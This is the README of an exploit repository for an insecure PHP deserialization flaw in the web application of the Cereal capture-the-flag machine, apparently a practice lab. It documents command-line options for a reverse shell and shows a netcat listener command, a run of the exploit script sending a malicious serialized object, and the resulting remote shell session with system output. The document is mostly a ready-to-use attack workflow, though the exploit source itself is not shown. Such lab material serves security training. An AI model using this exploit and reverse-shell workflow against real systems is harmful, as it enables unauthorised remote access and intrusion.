An exploit for the PHP insecure deserialization flaw found in the Cereal CTF machine.

KChuene/cereal-pid-exploit

Cereal CTF - Insecure PHP Deserialization Exploit

An exploit for an insecure deserialization flaw in the Cereal CTF web application, specifically the http://secure.cereal.ctf:44441/ endpoint.

Usage

General Usage

cereal.py [-h] -lhost IP_ADDR -lport PORT_NUM [-dbg]

Options

  • -h: show the help message and exit.
  • -lhost: local IP address for the reverse connection.
  • -lport: local port for the reverse connection.
  • -dbg: enable script debugging.

Example

Setup Listener

nc -lvp 1234

Send PHP Serial Object Payload

./cereal.py -lhost 192.168.56.137 -lport 1234 -dbg
(info) targeting http://secure.cereal.ctf:44441/
(info) sending malicious php serial object to target.
(info) exploit post finished with code <504>

Reverse Shell

listening on [any] 1234 ...
connect to [192.168.56.137] from cereal.ctf [192.168.56.139] 57984
uname -a
Linux cereal.ctf 4.18.0-240.22.1.el8.x86_64 #1 SMP Mon Apr 12 04:29:16 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
